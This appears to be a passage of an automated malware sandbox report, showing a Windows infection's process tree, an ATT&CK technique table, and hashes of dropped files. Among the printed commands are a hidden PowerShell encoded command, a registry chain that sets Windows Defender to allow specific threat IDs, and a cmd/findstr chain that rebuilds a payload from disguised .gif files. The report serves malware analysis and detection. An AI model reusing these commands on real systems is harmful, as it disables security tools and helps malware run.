"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
4⤵
- Blocklisted process makes network request
PID:3048

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 600
4⤵
- Program crash
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 944
4⤵
- Program crash
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 944
4⤵
- Program crash
PID:4728

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1044
4⤵
- Program crash
PID:3452

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 1052
4⤵
- Program crash
PID:1552

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 952
4⤵
- Program crash
PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1204 -s 956
4⤵
- Program crash
PID:1776

C:\Users\Admin\Documents\g2LZs1MbQFfqzFtPxl3zHnDF.exe
"C:\Users\Admin\Documents\g2LZs1MbQFfqzFtPxl3zHnDF.exe"
3⤵
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 468
4⤵
- Program crash
PID:2496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3896 -s 500
4⤵
- Program crash
PID:2768

C:\Users\Admin\Documents\1fyR0Sd2aV3i3akI5rq0PZFv.exe
"C:\Users\Admin\Documents\1fyR0Sd2aV3i3akI5rq0PZFv.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4200

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:224

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:5084

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
6⤵
- Enumerates processes with tasklist
PID:1020

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
6⤵
PID:4480

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
6⤵
- Enumerates processes with tasklist
PID:4912

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
6⤵
PID:2296

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
6⤵
PID:2992

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
6⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2284

C:\Users\Admin\Documents\axzyo4HCwZKUGcUxPBCfRQjA.exe
"C:\Users\Admin\Documents\axzyo4HCwZKUGcUxPBCfRQjA.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1824

C:\Users\Admin\Documents\JeysQhYz31CQLdtBWLpMqzAz.exe
"C:\Users\Admin\Documents\JeysQhYz31CQLdtBWLpMqzAz.exe"
3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3956

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:868

C:\Users\Admin\Documents\eBNdby7_U4k6msKv3eTB5mye.exe
"C:\Users\Admin\Documents\eBNdby7_U4k6msKv3eTB5mye.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2072

C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
"C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe"
2⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of AdjustPrivilegeToken
PID:3172

C:\Windows\system32\rUNdlL32.eXe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
1⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:2284

C:\Windows\SysWOW64\rundll32.exe
rUNdlL32.eXe "C:\Users\Admin\AppData\Local\Temp\axhub.dll",main
2⤵
- Loads dropped DLL
PID:3224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3224 -s 608
3⤵
- Program crash
PID:4344

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3224 -ip 3224
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4692 -ip 4692
1⤵
PID:1912

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3896 -ip 3896
1⤵
PID:1556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 220 -ip 220
1⤵
PID:2380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4304 -ip 4304
1⤵
PID:2504

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4392 -ip 4392
1⤵
PID:2016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4392 -s 564
1⤵
- Program crash
PID:4776

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 1204 -ip 1204
1⤵
PID:2516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4304 -ip 4304
1⤵
PID:4852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 220 -ip 220
1⤵
PID:4596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4692 -ip 4692
1⤵
PID:3868

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 3896 -ip 3896
1⤵
PID:4544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1984 -ip 1984
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:3896

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4304 -ip 4304
1⤵
PID:976

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 3148 -ip 3148
1⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 4304 -ip 4304
1⤵
PID:3808

C:\Windows\SysWOW64\qxiebjdn\xjslbbfw.exe
C:\Windows\SysWOW64\qxiebjdn\xjslbbfw.exe /d"C:\Users\Admin\Documents\l36_kCSX2CHi4f6qqS_AsMJ3.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:4268

C:\Windows\SysWOW64\svchost.exe
svchost.exe
2⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4268 -s 560
2⤵
- Program crash
PID:4072

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 4304 -ip 4304
1⤵
PID:2256

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 4268 -ip 4268
1⤵
PID:3724

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2472 -ip 2472
1⤵
PID:4436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 4304 -ip 4304
1⤵
PID:2436

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4920

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
2⤵
PID:216

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4304 -ip 4304
1⤵
PID:3188

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 4304 -ip 4304
1⤵
PID:3960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1204 -ip 1204
1⤵
PID:2460

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 1204 -ip 1204
1⤵
PID:3740

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 1204 -ip 1204
1⤵
PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1204 -ip 1204
1⤵
PID:3692

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:1784

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:3960

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:4816

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1204 -ip 1204
1⤵
PID:4320

C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\DmeRXPZ.exe
C:\Users\Admin\AppData\Local\Temp\uOvKJyFirsYYYLVYA\GHoNhggtAPCruoj\DmeRXPZ.exe j6 /site_id 525403 /S
1⤵
- Executes dropped EXE
PID:400

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:784

C:\Users\Admin\AppData\Local\cache\MoUSO.exe
C:\Users\Admin\AppData\Local\cache\MoUSO.exe
1⤵
- Executes dropped EXE
PID:4204

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1204 -ip 1204
1⤵
PID:3340

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

New Service

T1050

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

New Service

T1050

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
f31a2958507479809862150a4c11ff2c

SHA1
2566c9878a516afc6eab8cd3ecc58bede70ac3cf

SHA256
575e865560efadfd4ba31740f9c20cb054f08f4b1aebaa7d7a33e9d6b7c06ea0

SHA512
da0498599463670e468411f6b5bb0623aad47da4731a1bd8fcc65fdb80822df1dce1cc5ef414b42c5f3ebcf126a773d74e974d4d6cbaf8627e865c26facae9c5

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Complete.exe
MD5
92acb4017f38a7ee6c5d2f6ef0d32af2

SHA1
1b932faf564f18ccc63e5dabff5c705ac30a61b8

SHA256
2459694049abfe227ddcf5b4d813fe3ae8e1e9066de5228acf20c958d425c2e1

SHA512
d385b2857d934628e1df3ef493b3a33e2a042c5974d9c153c126a86a28fc61bcc02db0a0791c225378994737a16cd35b74f217600d4b837cda779200c9faeb73

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Files.exe
MD5
2d0217e0c70440d8c82883eadea517b9

SHA1
f3b7dd6dbb43b895ba26f67370af99952b7d83cb

SHA256
d8ede520a96e7eff75e753691e1dd2c764a3171ffa0144675c3e08f4be027c01

SHA512
6d7779a1f0dd54c0598bfb68f5e01a309021437a8b578353a063baf7c5ac2b29e5706ba51d1c1831e1517c5ea6fa662744c3f3e68a0e094c3b83ca9ed134413d

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Folder.exe
MD5
b89068659ca07ab9b39f1c580a6f9d39

SHA1
7e3e246fcf920d1ada06900889d099784fe06aa5

SHA256
9d225182e9a8f073e8cf1d60a8258369a394bcae5fbc52d845d71a0fa440539c

SHA512
940690b0844e678e45ead2e7639407ffac43ab45265d2682a4c2e6400ac8fa2188c50a3b17dad241517dd4624ee92d159c7e6d59c8d069b9edd1445115255d52

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
57ee9b2ca1e61816058d25157a5bd640

SHA1
3baa0a907e09790dab5b708367f7a746dd233b87

SHA256
e3d370f4667da34b1048e14e52658566447c000d683ad904d80ea2aaf34735ec

SHA512
eb392ff2ffbe6a0a9c1c2374892aac7431090a6817356425e51d47f955ff2a6acf477011319939ba591027bfd225541f92f11bc3ed0dfc9a013a90f77a459080

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
57ee9b2ca1e61816058d25157a5bd640

SHA1
3baa0a907e09790dab5b708367f7a746dd233b87

SHA256
e3d370f4667da34b1048e14e52658566447c000d683ad904d80ea2aaf34735ec

SHA512
eb392ff2ffbe6a0a9c1c2374892aac7431090a6817356425e51d47f955ff2a6acf477011319939ba591027bfd225541f92f11bc3ed0dfc9a013a90f77a459080

Download Submit
C:\Users\Admin\AppData\Local\Temp\Info.exe
MD5
57ee9b2ca1e61816058d25157a5bd640

SHA1
3baa0a907e09790dab5b708367f7a746dd233b87

SHA256
e3d370f4667da34b1048e14e52658566447c000d683ad904d80ea2aaf34735ec

SHA512
eb392ff2ffbe6a0a9c1c2374892aac7431090a6817356425e51d47f955ff2a6acf477011319939ba591027bfd225541f92f11bc3ed0dfc9a013a90f77a459080

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
6e5d18d898b78cf34ba861bd0fb087c4

SHA1
2cfe66bd6c3862bf11d8da4e43a287129e7cb540

SHA256
d02aa731d9dc089424e77c07c66c6b93bedacf779269a7da63ed496763cd7fa1

SHA512
3ef34d3fe119c00623924cf46475b79d9cfc5fab68af0d20559c74a2fa80245a32b4f30fc2bd500b95c80537f0f29c7eb93025c9b0f7ae56b6b615553605f409

Download Submit
C:\Users\Admin\AppData\Local\Temp\Install.exe
MD5
6e5d18d898b78cf34ba861bd0fb087c4

SHA1
2cfe66bd6c3862bf11d8da4e43a287129e7cb540

SHA256
d02aa731d9dc089424e77c07c66c6b93bedacf779269a7da63ed496763cd7fa1

SHA512
3ef34d3fe119c00623924cf46475b79d9cfc5fab68af0d20559c74a2fa80245a32b4f30fc2bd500b95c80537f0f29c7eb93025c9b0f7ae56b6b615553605f409

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
cbafd60beffb18c666ff85f1517a76f9

SHA1
9e015cba7168b610969bfc299a4ffe4763f4fd5f

SHA256
d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d

SHA512
ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\Installation.exe
MD5
cbafd60beffb18c666ff85f1517a76f9

SHA1
9e015cba7168b610969bfc299a4ffe4763f4fd5f

SHA256
d31f2d2d991acee74d9be732c8180f37cea12aceaba324804fbcf2d0d2891a3d

SHA512
ba61ac5f49827b0fba2c72f4b19540b91f8bceb8b441a713b7de00317059955ad592c88af8f9c94093077503ab3b4c4c522b0e577599ca5020ad1b0f254066ce

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
5af9f5b4e531fab8417a2f137350c842

SHA1
644e6ea394ba94830101d4aeb7d9d23c690b0b83

SHA256
a8543cfdbca49e47db17342a882732ae5889601ab06c56927ec1761ba09bfbc4

SHA512
8a0fd77bb8dac23e84e559624c812326184145b7add8ea502c8c11a5c8ba68d5b69878311c41981d75a163ee428e7969e9dd5c4fef955e43913a1e037d4b7b31

Download Submit
C:\Users\Admin\AppData\Local\Temp\KRSetp.exe
MD5
5af9f5b4e531fab8417a2f137350c842

SHA1
644e6ea394ba94830101d4aeb7d9d23c690b0b83

SHA256
a8543cfdbca49e47db17342a882732ae5889601ab06c56927ec1761ba09bfbc4

SHA512
8a0fd77bb8dac23e84e559624c812326184145b7add8ea502c8c11a5c8ba68d5b69878311c41981d75a163ee428e7969e9dd5c4fef955e43913a1e037d4b7b31

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dat
MD5
5fd2eba6df44d23c9e662763009d7f84

SHA1
43530574f8ac455ae263c70cc99550bc60bfa4f1

SHA256
2991e2231855661e94ef80a4202487a9d7dc7bebccab9a0b2a786cf0783a051f

SHA512
321a86725e533dedb5b74e17218e6e53a49fa6ffc87d7f7da0f0b8441a081fe785f7846a76f67ef03ec3abddacbe8906b20a2f3ce8178896ec57090ef7ab0eb7

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\axhub.dll
MD5
1c7be730bdc4833afb7117d48c3fd513

SHA1
dc7e38cfe2ae4a117922306aead5a7544af646b8

SHA256
8206b4b3897ca45b9e083273f616902966e57091516844906e6ae2aefe63cef1

SHA512
7936c862a06b7ecdb6710a1bb62cbea149f75504b580c2f100945674c987f3eec53e9aa5915e32b4f74bcf46f2df9468f68a454400faebd909f933e8072e0f2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
b7161c0845a64ff6d7345b67ff97f3b0

SHA1
d223f855da541fe8e4c1d5c50cb26da0a1deb5fc

SHA256
fe9e28ff0b652e22a124b0a05382bc1ac48cbd9c7c76ca647b0c9f8542888f66

SHA512
98d8971ff20ba256cf886a9db416ac9366d2c6ad4ff51a65bd7e539974dc93f4c897f92d8c9c0319c69b27eacf05cd350a0302828e63190b03457a0eda57f680

Download Submit
C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
MD5
530531a72ac486cad84e387402016a53

SHA1
8aac6ed40b275f25c7c141c818e30435bbe504c8

SHA256
e050d3831da5f73cdae28b382feb9feeed7d560c709b1169430195eba681f614

SHA512
cd0a2e8c7d1204814a98ab40f2a8ff1b08cf3728daa3853ba1305b83fd562f4091975bc47a77435b82e86d0d6136120e8a82af72de05ed8cedd27fd71f26de35

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
7fee8223d6e4f82d6cd115a28f0b6d58

SHA1
1b89c25f25253df23426bd9ff6c9208f1202f58b

SHA256
a45317c374d54e322153afd73f0e90f1486638d77b7fd85746d091071bbecd59

SHA512
3ed900b83dd178637c2fd4e8444a899f17f12c4ec92a6f4de4fe544fe8d41b521c69b8f348343cb397d0e160f23e27429042d758b5fa5acac0bab5c3584bace4

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
MD5
a6279ec92ff948760ce53bba817d6a77

SHA1
5345505e12f9e4c6d569a226d50e71b5a572dce2

SHA256
8b581869bf8944a8e0aa169adea2a4afe47434123da477132880aff6a5032181

SHA512
213cb374f1273c899e0c88a20c0101a7c28024ce5046a2e0d7898bd182d918288bb80367fea4454c437c057ff9ed4fffd42be48a13ca73653021a6d63e1cfa9c

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
9b55bffb97ebd2c51834c415982957b4

SHA1
728262abdfc4f0e8a84eb3b5cd2be9ea9d0acc16

SHA256
a62cee3d2610ed0f693179838803e5c60dcd4f68028c60f5761b90c750125e11

SHA512
4fa9d641aba15fd07a0711530ab1f1a4e8dbafe03e1ab71845bcdcd0a1efa9e59a05915834c5c717beada659dd5ee459aa7e08b4b0acc8f867ace07430eb11f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\md9_1sjm.exe
MD5
9b55bffb97ebd2c51834c415982957b4

SHA1
728262abdfc4f0e8a84eb3b5cd2be9ea9d0acc16

SHA256
a62cee3d2610ed0f693179838803e5c60dcd4f68028c60f5761b90c750125e11

SHA512
4fa9d641aba15fd07a0711530ab1f1a4e8dbafe03e1ab71845bcdcd0a1efa9e59a05915834c5c717beada659dd5ee459aa7e08b4b0acc8f867ace07430eb11f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\mysetold.exe
MD5
96cf21aab98bc02dbc797e9d15ad4170

SHA1
